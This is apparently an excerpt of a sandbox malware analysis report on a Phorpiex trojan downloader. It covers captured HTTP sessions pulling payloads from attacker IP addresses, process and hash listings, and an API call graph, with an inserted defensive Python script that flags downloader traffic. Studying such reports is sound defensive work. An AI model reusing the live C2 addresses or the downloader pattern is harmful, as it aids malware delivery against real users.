                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:26:10.498344898 CEST | 465 | IN | Data Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session ID: 60
                                                                              Source IP: 192.168.2.8   Source Port: 49809   Destination IP: 185.215.113.66   Destination Port: 80   PID: 2060   Process: C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:26:12.870759010 CEST | 167 | OUT | GET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:26:13.211987972 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:26:13 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:26:13.212258101 CEST | 1289 | IN | Data Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:26:13.212305069 CEST | 1289 | IN | Data Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:26:13.212373972 CEST | 1289 | IN | Data Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:26:13.212554932 CEST | 1289 | IN | Data Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:26:13.212584019 CEST | 1289 | IN | Data Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:26:13.212657928 CEST | 1289 | IN | Data Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:26:13.212678909 CEST | 465 | IN | Data Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB
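
Three checks an analyst can run over the sessions captured above, written as an added example that is not part of the Joe Sandbox report. The header values and byte counts are copied from the sessions shown; the parsing, the indicator logic and the audit() wrapper are the editor's own. First, the recorded byte counts (166 and 167 for the requests, 728 for the 404 reply, 7 × 1289 + 465 for the /_1 download) are exactly what the lines shown account for with CRLF line endings, so the downloader sends nothing beyond a request line, a spoofed Chrome User-Agent and a bare-IP Host, and the full 9224-byte payload was captured. Second, that header shape (browser User-Agent, no Accept/Accept-Encoding/Accept-Language, Host is an IP literal) is itself a usable detection signal. Third, nginx's default ETag is the served file's mtime and size in hex, so "663b6371-2408" and "663a7350-2408" decode to when each payload was staged on the server (08 May 2024 11:35:13 UTC and 07 May 2024 18:30:40 UTC, matching Last-Modified) and to 0x2408 = 9224 bytes, matching Content-Length.

```python
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed from the sessions captured above: header values are copied
# from the report, everything else is editor-written example code.
CHROME124 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36")
CHROME121 = CHROME124.replace("Chrome/124.0.0.0", "Chrome/121.0.0.0")

# (session, "Bytes transferred" recorded for the request, start line, headers)
REQUESTS = [
    (56, 166, "GET /4 HTTP/1.1", [("User-Agent", CHROME124), ("Host", "91.202.233.141")]),
    (59, 167, "GET /_1 HTTP/1.1", [("User-Agent", CHROME121), ("Host", "185.215.113.66")]),
]
# Session 56 response: a single IN record of 728 bytes.
RESPONSE_404 = ("HTTP/1.1 404 Not Found", [
    ("Server", "nginx/1.18.0 (Ubuntu)"), ("Date", "Wed, 08 May 2024 13:25:51 GMT"),
    ("Content-Type", "text/html"), ("Content-Length", "564"), ("Connection", "keep-alive"),
], 564)
# Session 59 response: seven IN records of 1289 bytes and one of 465.
RESPONSE_200 = ("HTTP/1.1 200 OK", [
    ("Server", "nginx/1.18.0 (Ubuntu)"), ("Date", "Wed, 08 May 2024 13:26:10 GMT"),
    ("Content-Type", "application/octet-stream"), ("Content-Length", "9224"),
    ("Last-Modified", "Wed, 08 May 2024 11:35:13 GMT"), ("Connection", "keep-alive"),
    ("ETag", '"663b6371-2408"'), ("Accept-Ranges", "bytes"),
], 9224)
CHUNKS_59 = [1289] * 7 + [465]
# (session, Content-Length, ETag, Last-Modified) of the two payload downloads
PAYLOADS = [
    (59, 9224, '"663b6371-2408"', "Wed, 08 May 2024 11:35:13 GMT"),
    (60, 9224, '"663a7350-2408"', "Tue, 07 May 2024 18:30:40 GMT"),
]


def wire_length(start_line, headers, body_len=0):
    """Bytes an HTTP/1.1 message occupies on the wire: the start line, one
    CRLF-terminated line per header, the empty separator line, then the body."""
    head = start_line + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers) + "\r\n"
    return len(head.encode("ascii")) + body_len


def capture_is_complete(recorded_bytes, start_line, headers, body_len=0):
    """True when the lines shown account for every byte the sandbox recorded,
    i.e. no header was elided and (for responses) the whole body arrived."""
    return wire_length(start_line, headers, body_len) == recorded_bytes


BROWSER_HEADERS = {"accept", "accept-encoding", "accept-language"}
BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def downloader_indicators(headers):
    """Reasons a request looks like a downloader wearing a browser User-Agent:
    a real Chrome always sends content-negotiation headers, and users rarely
    browse to a bare IP address."""
    lower = {k.lower(): v for k, v in headers}
    reasons = []
    if "chrome/" in lower.get("user-agent", "").lower() and not BROWSER_HEADERS & set(lower):
        reasons.append("browser User-Agent without Accept/Accept-Encoding/Accept-Language")
    if BARE_IPV4.match(lower.get("host", "")):
        reasons.append("Host header is a bare IPv4 address")
    return reasons


def decode_nginx_etag(etag):
    """nginx's static file handler emits ETag '"<mtime hex>-<size hex>"'.
    Returns (mtime as an aware UTC datetime, size in bytes)."""
    mtime_hex, size_hex = etag.strip('"').split("-", 1)
    return datetime.fromtimestamp(int(mtime_hex, 16), tz=timezone.utc), int(size_hex, 16)


def etag_consistent(etag, content_length, last_modified):
    """Cross-check the decoded ETag against Content-Length and Last-Modified."""
    mtime, size = decode_nginx_etag(etag)
    return size == content_length and mtime == parsedate_to_datetime(last_modified)


def audit():
    """Run every check over the constructed records; returns (session, check, result)."""
    findings = []
    for sid, nbytes, start, hdrs in REQUESTS:
        findings.append((sid, "request fully shown", capture_is_complete(nbytes, start, hdrs)))
        findings.append((sid, "downloader indicators", downloader_indicators(hdrs)))
    findings.append((56, "404 fully captured", capture_is_complete(728, *RESPONSE_404)))
    findings.append((59, "payload fully captured", capture_is_complete(sum(CHUNKS_59), *RESPONSE_200)))
    for sid, clen, etag, lm in PAYLOADS:
        staged, _ = decode_nginx_etag(etag)
        findings.append((sid, "payload staged on server (UTC)", staged.isoformat()))
        findings.append((sid, "ETag matches Content-Length/Last-Modified", etag_consistent(etag, clen, lm)))
    return findings


if __name__ == "__main__":
    for sid, check, result in audit():
        print(f"session {sid}: {check}: {result}")
```

Run it directly to print the findings. The same functions apply to any proxy or Zeek/Suricata HTTP log once the header lists are filled from that source; the ETag decoding only holds for nginx's default static handler, so a mismatch there means the ETag came from something else (a proxy, an application, or a deliberately forged header), not that the capture is wrong.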


                                                                              Target ID:0
                                                                              Start time:15:22:09
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe"
                                                                              Imagebase:0x400000
                                                                              File size:100'864 bytes
                                                                              MD5 hash:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000000.1395571963.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000003.1416145697.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:15:22:11
                                                                              Start date:08/05/2024
                                                                              Path:C:\Windows\sysbrapsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\sysbrapsvc.exe
                                                                              Imagebase:0x400000
                                                                              File size:100'864 bytes
                                                                              MD5 hash:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000000.1416106928.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000003.1665949097.0000000004781000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysbrapsvc.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 79%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:4
                                                                              Start time:15:22:23
                                                                              Start date:08/05/2024
                                                                              Path:C:\Windows\sysbrapsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\sysbrapsvc.exe"
                                                                              Imagebase:0x400000
                                                                              File size:100'864 bytes
                                                                              MD5 hash:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000000.1544428131.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:15:22:25
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\3193211493.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\3193211493.exe
                                                                              Imagebase:0x400000
                                                                              File size:100'864 bytes
                                                                              MD5 hash:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000000.1558944525.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\3193211493.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 79%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:15:22:38
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Imagebase:0xdb0000
                                                                              File size:14'848 bytes
                                                                              MD5 hash:D085F41FE497A63DC2A4882B485A2CAF
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 96%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:8
                                                                              Start time:15:22:50
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\2303012543.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\2303012543.exe
                                                                              Imagebase:0xb50000
                                                                              File size:8'704 bytes
                                                                              MD5 hash:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 30%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:15:22:52
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\winploravr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\winploravr.exe"
                                                                              Imagebase:0x2a0000
                                                                              File size:14'848 bytes
                                                                              MD5 hash:D085F41FE497A63DC2A4882B485A2CAF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 96%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:15:22:56
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\2006625995.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\2006625995.exe
                                                                              Imagebase:0xd70000
                                                                              File size:22'016 bytes
                                                                              MD5 hash:802C60DB52BD6C4DB699A74F63A00D8D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:15:22:59
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\2711236308.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\2711236308.exe
                                                                              Imagebase:0x390000
                                                                              File size:8'704 bytes
                                                                              MD5 hash:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 30%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:15:23:00
                                                                              Start date:08/05/2024
                                                                              Path:C:\Windows\winploravr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\winploravr.exe"
                                                                              Imagebase:0xf0000
                                                                              File size:14'848 bytes
                                                                              MD5 hash:D085F41FE497A63DC2A4882B485A2CAF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 96%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:15:23:04
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\330125677.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\330125677.exe
                                                                              Imagebase:0x6f0000
                                                                              File size:8'704 bytes
                                                                              MD5 hash:11D2F27FB4F0C424AB696573E79DB18C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 62%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:15:23:07
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\1245832676.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\1245832676.exe
                                                                              Imagebase:0xae0000
                                                                              File size:8'704 bytes
                                                                              MD5 hash:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 30%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:15:23:08
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\winploravr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\winploravr.exe"
                                                                              Imagebase:0x2a0000
                                                                              File size:14'848 bytes
                                                                              MD5 hash:D085F41FE497A63DC2A4882B485A2CAF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:15:23:12
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\300129380.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\300129380.exe
                                                                              Imagebase:0x3f0000
                                                                              File size:11'264 bytes
                                                                              MD5 hash:CAFD277C4132F5D0F202E7EA07A27D5C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 38%, ReversingLabs
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:0.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:16.6%
                                                                                Total number of Nodes:1471
                                                                                Total number of Limit Nodes:8
memcpy 4872->4873 4888 409970 4872->4888 4873->4872 4877 40a026 4875->4877 4881 40a01c 4875->4881 4876 409970 64 API calls 4878 40a0a7 4876->4878 4877->4876 4877->4881 4879 409420 6 API calls 4878->4879 4878->4881 4880 40a0c6 4879->4880 4880->4881 4882 40a0db memcpy 4880->4882 4881->4862 4882->4881 4884 40946e 4883->4884 4886 40942e 4883->4886 4884->4869 4886->4884 4887 409360 6 API calls 4886->4887 4887->4886 4889 409980 4888->4889 4890 40998a 4888->4890 4889->4872 4890->4889 4898 4097b0 4890->4898 4893 409ac8 memcpy 4893->4889 4895 409ae7 memcpy 4896 409c11 4895->4896 4897 409970 62 API calls 4896->4897 4897->4889 4899 4097bd 4898->4899 4901 4097c7 4898->4901 4899->4889 4899->4893 4899->4895 4900 409850 4909 409110 4900->4909 4901->4899 4901->4900 4903 409855 4901->4903 4904 409838 4901->4904 4905 409420 6 API calls 4903->4905 4907 409420 6 API calls 4904->4907 4905->4900 4907->4900 4908 4098fc memset 4908->4899 4910 409129 4909->4910 4918 40911f 4909->4918 4911 408fe0 9 API calls 4910->4911 4910->4918 4912 409222 4911->4912 4913 40a450 __aligned_recalloc_base 7 API calls 4912->4913 4914 409271 4913->4914 4915 408e50 46 API calls 4914->4915 4914->4918 4916 40929e 4915->4916 4917 40a660 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4916->4917 4917->4918 4918->4899 4918->4908 4938 40a300 GetCurrentProcessId 4919->4938 4921 40a49b 4922 40a320 __aligned_recalloc_base 5 API calls 4921->4922 4923 40a4a7 __aligned_recalloc_base 4921->4923 4922->4923 4924 40a550 HeapAlloc 4923->4924 4925 40a51a HeapReAlloc 4923->4925 4926 40a5a0 _invalid_parameter HeapValidate 4923->4926 4927 40a660 _invalid_parameter 3 API calls 4923->4927 4928 405cb5 4923->4928 4924->4923 4925->4923 4926->4923 4927->4923 4928->4699 4928->4704 4932 40c64b 4929->4932 4930 40a450 __aligned_recalloc_base 7 API calls 4930->4932 4931 405d4d 4931->4704 4933 4072a0 4931->4933 4932->4930 4932->4931 4934 40a450 __aligned_recalloc_base 7 API calls 4933->4934 4935 4072b0 4934->4935 4936 4072f7 
4935->4936 4937 4072bc memcpy CreateThread CloseHandle 4935->4937 4936->4704 4937->4936 4939 407300 4937->4939 4938->4921 4940 407371 4939->4940 4941 407311 4939->4941 4942 40737c DeleteUrlCacheEntry 4940->4942 4945 40736f 4940->4945 4944 407320 StrChrA 4941->4944 4941->4945 4948 407344 DeleteUrlCacheEntry 4941->4948 4946 40ef90 64 API calls 4942->4946 4943 40a660 _invalid_parameter 3 API calls 4947 4073a6 4943->4947 4944->4941 4944->4948 4945->4943 4946->4945 4951 40ef90 9 API calls 4948->4951 4952 40f053 InternetOpenUrlW 4951->4952 4953 40f1be InternetCloseHandle Sleep 4951->4953 4954 40f1b1 InternetCloseHandle 4952->4954 4955 40f082 CreateFileW 4952->4955 4956 40f1e5 7 API calls 4953->4956 4957 407359 Sleep 4953->4957 4954->4953 4958 40f0b1 InternetReadFile 4955->4958 4959 40f1a4 CloseHandle 4955->4959 4956->4957 4960 40f274 wsprintfW DeleteFileW Sleep 4956->4960 4957->4941 4961 40f104 CloseHandle wsprintfW DeleteFileW Sleep 4958->4961 4962 40f0d5 4958->4962 4959->4954 4963 40ec70 21 API calls 4960->4963 4979 40ec70 CreateFileW 4961->4979 4962->4961 4964 40f0de WriteFile 4962->4964 4966 40f2b4 4963->4966 4964->4958 4968 40f2f2 DeleteFileW 4966->4968 4969 40f2be Sleep 4966->4969 4968->4957 4972 40ee30 6 API calls 4969->4972 4970 40f197 DeleteFileW 4970->4959 4971 40f15b Sleep 4973 40ee30 6 API calls 4971->4973 4974 40f2d5 4972->4974 4975 40f172 4973->4975 4974->4957 4977 40f2e8 ExitProcess 4974->4977 4976 40f18e 4975->4976 4978 40f186 ExitProcess 4975->4978 4976->4959 4980 40ecb5 CreateFileMappingW 4979->4980 4981 40edca 4979->4981 4982 40edc0 CloseHandle 4980->4982 4983 40ecd6 MapViewOfFile 4980->4983 4984 40edd0 CreateFileW 